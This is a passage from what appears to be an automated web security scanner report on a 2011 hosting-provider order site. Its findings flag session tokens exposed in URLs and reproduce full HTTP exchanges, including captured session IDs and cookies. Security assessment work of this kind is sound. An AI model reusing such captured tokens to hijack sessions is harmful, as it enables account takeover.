Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=VirtualServerL&amp;linkOrigin=VirtualServerL&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=VirtualServerL&amp;page=switch&amp;linkOrigin=VirtualServerL&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
</p><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff"><strong>
...[SNIP]...
<span class="osLinux"><a rel="height=480, width=665" class="btn btn-detail-darkblue btn-pos-detail window-open" href="/xml/order/FeatureServerVpsOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
<span class="osWindows"><a rel="height=480, width=665" class="btn btn-detail-darkblue btn-pos-detail window-open" href="/xml/order/FeatureServerVpsOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
<td class="link"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerProcessor;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerHarddrive;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerVpsOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerVpsOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsSB;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerSsl;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
</p><a rel="height=480, width=643" class="window-open" href="/xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=VirtualServerL&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.100. http://order.1and1.com/xml/order/VirtualServerL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.101. http://order.1and1.com/xml/order/VirtualServerXL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXL

Issue detail

The URL in the request appears to contain a session token, carried as the ;jsessionid= path parameter shown in the request line below. The server answered with a 301 whose Location header repeats the URL without the ;jsessionid parameter, so the token is not re-emitted here; the exposure is the token already present in the requested URL.

Request

GET /xml/order/VirtualServerXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXL?__frame=_top&__lf=Order-Tariff&ordernow=true
Content-Length: 0
Connection: close
Content-Type: text/plain


3.102. http://order.1and1.com/xml/order/VirtualServerXXL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXXL

Issue detail

The URL in the request appears to contain a session token, carried as the ;jsessionid= path parameter shown in the request line below. As in the previous finding, the server answered with a 301 whose Location header drops the ;jsessionid parameter, so the token is not re-emitted; the exposure is the token already present in the requested URL.

Request

GET /xml/order/VirtualServerXXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXXL?__frame=_top&__lf=Order-Tariff&ordernow=true
Content-Length: 0
Connection: close
Content-Type: text/plain


3.103. http://order.1and1.com/xml/order/a

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/a

Issue detail

The URL in the request appears to contain a session token, carried as the ;jsessionid= path parameter shown in the request line below. The requested path does not exist (the server returns 404), but the token was transmitted regardless; note that the Referer header carries a second, different jsessionid value, so this single request exposes two session identifiers.

Request

GET /xml/order/a;jsessionid=32FBEC28C43E74DBD62611CCB0A88751.TCpfix142a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320185042-000.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS8vLiwqLC8=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:36:AAABLtRpVq_aAytDkGAYcbJbpeGoxEgR:1300643796655; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; __PFIX_TST_=11df10d3b144d000

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 17:56:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1439

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>1&amp;1 Internet AG - Page or Document not found</title>
<meta h
...[SNIP]...

3.104. http://order.1and1.com/xml/order/addon

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/addon

Issue detail

The URL in the request appears to contain a session token, carried as the ;jsessionid= path parameter shown in the request line below. The server answered with a 301 whose Location header repeats the URL without the ;jsessionid parameter, so the token is not re-emitted here; the exposure is the token already present in the requested URL.

Request

GET /xml/order/addon;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.packageselection HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:52:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/addon?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.packageselection
Content-Length: 0
Connection: close
Content-Type: text/plain


3.105. http://order.1and1.com/xml/order/costs

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/costs

Issue detail

The URL in the request appears to contain a session token, carried as the ;jsessionid= path parameter shown in the request line below. The server answered with a 302 to the https:// form of the same URL with the ;jsessionid parameter preserved: the token has already crossed the network in clear text in the http:// request, and it is carried again in the Location header.

Request

GET /xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.yourcart HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:59 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4ce5cf5491256400; Path=/
